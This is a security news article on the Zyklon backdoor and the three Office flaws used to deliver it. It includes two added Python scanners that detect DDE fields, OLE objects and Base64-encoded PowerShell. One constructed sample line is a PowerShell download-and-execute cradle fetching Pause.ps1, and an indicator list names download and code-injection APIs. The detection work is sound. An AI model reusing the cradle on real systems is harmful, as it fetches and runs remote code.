Zyklon malware is being spread through three Microsoft Office vulnerabilities. The attackers are targeting telecommunications, insurance, and financial services companies. According to FireEye researchers, the attackers are trying to harvest passwords and cryptocurrency wallet data, and to build a list of targets for possible future DDoS attacks.
The researchers said the attack begins with a spam campaign that delivers a malicious ZIP file containing one of several kinds of DOC files, each of which ultimately exploits one of three Microsoft Office vulnerabilities.
The first vulnerability is a .NET Framework flaw (CVE-2017-8759) that Microsoft patched last October. Microsoft said that opening an infected document allowed attackers to install programs, manipulate data, and create new privileged accounts. In the attack described by FireEye, the infected DOC file contains an embedded OLE object that, when executed, triggers the download of additional DOC files from a stored URL. In mid-September 2017, the .NET Framework zero-day CVE-2017-8759 was already being used by attackers to distribute FinFisher malware.
The second vulnerability (CVE-2017-11882) is a 17-year-old remote code execution bug in an Office executable, Microsoft Equation Editor. It was patched as part of Microsoft's November 2017 Patch Tuesday release. As with the first vulnerability, victims who opened a specially crafted DOC automatically downloaded additional DOC files, which contained PowerShell commands that fetch the final payload. At the end of November 2017, the Office memory corruption vulnerability CVE-2017-11882 was being exploited in the wild, with the Cobalt group among the attackers using it.
Microsoft does not consider the third vector, Dynamic Data Exchange (DDE), to be a vulnerability; it insists that DDE is a product feature. However, in November it released guidance for administrators on how to safely disable the feature through new Office registry settings. By mid-October 2017, DDE attacks, which do not require macros to be enabled, were being used to execute malware from Office applications, and the FIN7 financial hackers were already using them.
DDE is a protocol that defines how applications send messages and share data through shared memory. However, over the past year attackers have had great success using DDE, in the same role as macro-based malware, to launch droppers, exploits and malware.
In the recent attacks, FireEye said, DDE was also used to download a dropper.
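Two of the three delivery paths described above leave marks inside the document itself: a DDE field code, or an embedded OLE object. The following scanner is an added example (not FireEye's tooling and not code from the original report) that inspects a Word OOXML (.docx) container for both, joining the runs of each field so that a DDE keyword split across runs is still seen whole. The three sample documents are constructed in memory; legacy binary .doc files use a different container and would need a separate parser.

```python
import io
import re
import zipfile

# Tokens that delimit Word field codes: <w:fldChar w:fldCharType="begin|separate|end"/>
# and the <w:instrText> runs that carry the field instruction between them.
FIELD_TOKEN_RE = re.compile(
    r'<w:fldChar\b[^>]*\bw:fldCharType="(begin|separate|end)"[^>]*/?>'
    r'|<w:instrText\b[^>]*>(.*?)</w:instrText>',
    re.S,
)
SIMPLE_FIELD_RE = re.compile(r'<w:fldSimple\b[^>]*\bw:instr="([^"]*)"')
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.I)


def field_codes(document_xml):
    """Return every field instruction in the document. The instrText runs of a
    complex field are joined, so a keyword split across runs is still seen whole."""
    fields, current, depth = [], [], 0
    for m in FIELD_TOKEN_RE.finditer(document_xml):
        kind, text = m.group(1), m.group(2)
        if kind == "begin":
            depth += 1
        elif kind == "end":
            depth = max(depth - 1, 0)
            if depth == 0 and current:
                fields.append("".join(current))
                current = []
        elif text is not None and depth > 0:
            current.append(text)
    if current:  # unterminated field: report it anyway
        fields.append("".join(current))
    fields.extend(SIMPLE_FIELD_RE.findall(document_xml))
    return fields


def scan_docx(data):
    """Flag DDE field codes, embedded OLE parts and VBA projects in a .docx blob."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        xml = zf.read("word/document.xml").decode("utf-8", "replace") if "word/document.xml" in names else ""
    report = {
        "dde_fields": [f.strip() for f in field_codes(xml) if DDE_RE.search(f)],
        "ole_parts": [n for n in names if n.startswith("word/embeddings/")],
        "ole_elements": len(re.findall(r"<o:OLEObject\b", xml)),
        "vba": "word/vbaProject.bin" in names,
    }
    report["suspicious"] = bool(report["dde_fields"] or report["ole_parts"]
                                or report["ole_elements"] or report["vba"])
    return report


W_NS = 'xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
O_NS = 'xmlns:o="urn:schemas-microsoft-com:office:office"'


def build_docx(document_xml, extra_parts=None):
    """Write the minimum of a .docx container that scan_docx needs (constructed;
    a file saved by Word carries more parts)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", document_xml)
        for name, blob in (extra_parts or {}).items():
            zf.writestr(name, blob)
    return buf.getvalue()


# Constructed sample 1: a DDEAUTO field whose keyword is split across two runs.
DDE_XML = f"""<w:document {W_NS}><w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> DD</w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">EAUTO "constructed-target" "constructed-args" </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r>
<w:r><w:t>placeholder text</w:t></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>"""

# Constructed sample 2: an embedded OLE object stored as a binary part.
OLE_XML = f"""<w:document {W_NS} {O_NS}><w:body><w:p><w:r><w:object>
<o:OLEObject Type="Embed" ProgID="Package" ObjectID="_1" r:id="rId1"/>
</w:object></w:r></w:p></w:body></w:document>"""

# Constructed sample 3: benign fields (a hyperlink and a date), no embeddings.
BENIGN_XML = f"""<w:document {W_NS}><w:body><w:p>
<w:fldSimple w:instr=" HYPERLINK &quot;https://example.invalid/&quot; "><w:r><w:t>link</w:t></w:r></w:fldSimple>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> DATE \\@ "d MMMM yyyy" </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>"""

SAMPLE_DDE = build_docx(DDE_XML)
SAMPLE_OLE = build_docx(OLE_XML, {"word/embeddings/oleObject1.bin": b"\xd0\xcf\x11\xe0constructed"})
SAMPLE_BENIGN = build_docx(BENIGN_XML)

if __name__ == "__main__":
    for label, sample in (("dde", SAMPLE_DDE), ("ole", SAMPLE_OLE), ("benign", SAMPLE_BENIGN)):
        print(label, scan_docx(sample))
```

The scanner is deliberately regex-based rather than a full XML parse so that it still reports on documents whose XML has been mangled to break parsers; an `OLEObject` element is counted separately from the binary part it points at, because either one alone is already worth a look at a mail gateway.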
The researchers wrote:
“In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded.”
The Pause.ps1 script is responsible for resolving the APIs required for code injection. Ultimately, Pause.ps1 acts as another dropper that delivers the final “core payload.”
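Because every delivery path in this chain ends in Base64-encoded PowerShell, process command lines are the natural place to catch it. The following is an added example (not FireEye's code and not from the original report) that pulls `-EncodedCommand` blobs out of a command line, decodes them as the UTF-16LE that PowerShell expects, keeps decoding nested `FromBase64String` blobs, and reports download and injection indicators at each stage. The command lines and the two staged scripts are constructed for the example; the indicator list and the nesting depth are choices of the example, not of the malware.

```python
import base64
import binascii
import re

# -EncodedCommand may be abbreviated to any unambiguous prefix (-e, -enc, ...).
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(e[A-Za-z]*)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
# Long Base64 runs inside an already-decoded script, e.g. FromBase64String('...').
NESTED_B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Indicators chosen for this example: download cradles, inline evaluation and
# the classic injection APIs. Tune to your environment.
INDICATORS = ("downloadstring", "downloadfile", "net.webclient", "invoke-webrequest",
              "iex", "invoke-expression", "frombase64string",
              "virtualalloc", "writeprocessmemory", "createremotethread")


def decode_blob(blob):
    """Base64-decode a blob and pick the text encoding by the NUL pattern."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw:
        return None
    # -EncodedCommand is UTF-16LE; ASCII text in UTF-16LE has a NUL in every
    # odd byte. A hand-rolled FromBase64String blob may be UTF-8 instead.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", "replace")
    return raw.decode("utf-8", "replace")


def find_indicators(text):
    low = text.lower()
    return [tok for tok in INDICATORS
            if re.search(r"(?<![a-z0-9])" + re.escape(tok) + r"(?![a-z0-9])", low)]


def _collect(text, depth, max_depth, stages):
    stages.append({"depth": depth, "text": text, "indicators": find_indicators(text)})
    if depth >= max_depth:
        return
    for blob in NESTED_B64_RE.findall(text):
        inner = decode_blob(blob)
        if inner and sum(c.isprintable() or c.isspace() for c in inner) / len(inner) > 0.9:
            _collect(inner, depth + 1, max_depth, stages)


def analyze_command_line(cmdline, max_depth=3):
    """Return every decoded PowerShell stage in a command line with its indicators."""
    stages = []
    for m in ENC_FLAG_RE.finditer(cmdline):
        flag, blob = m.group(1), m.group(2)
        if not "encodedcommand".startswith(flag.lower()):
            continue  # e.g. -ExecutionPolicy is not a prefix of -EncodedCommand
        text = decode_blob(blob)
        if text is not None:
            _collect(text, 1, max_depth, stages)
    return {"stages": stages, "suspicious": any(s["indicators"] for s in stages)}


def _b64_utf16(script):
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: a two-stage encoded script and a benign maintenance call.
STAGE2 = "Write-Output 'stage two placeholder'"
STAGE1 = ("$s=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
          + _b64_utf16(STAGE2) + "'));"
          "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/Pause.ps1')")
SAMPLE_CMDLINES = [
    "powershell.exe -NonInteractive -Enc " + _b64_utf16(STAGE1),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = analyze_command_line(line)
        print(result["suspicious"], [(s["depth"], s["indicators"]) for s in result["stages"]])
```

The encoding heuristic matters in practice: decoding a UTF-16LE blob as UTF-8 yields NUL-riddled text that defeats substring matching, which is exactly what an attacker hopes a naive decoder will do.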
FireEye wrote:
“Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery from browsers and email software.”
In this case, Zyklon can also communicate with its command-and-control (C&C) server over the Tor network, the researchers said:
“The Zyklon executable contains another encrypted file in its .Net resource section named tor. This file is decrypted and injected into an instance of InstallUtil.exe, and functions as a Tor anonymizer.”
The researchers said the malware can be used to perform many different tasks, including downloading new plugins, stealing passwords, or opening a proxy and establishing a reverse SOCKS5 proxy on the infected host. FireEye said:
“These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.”
Source: threatpost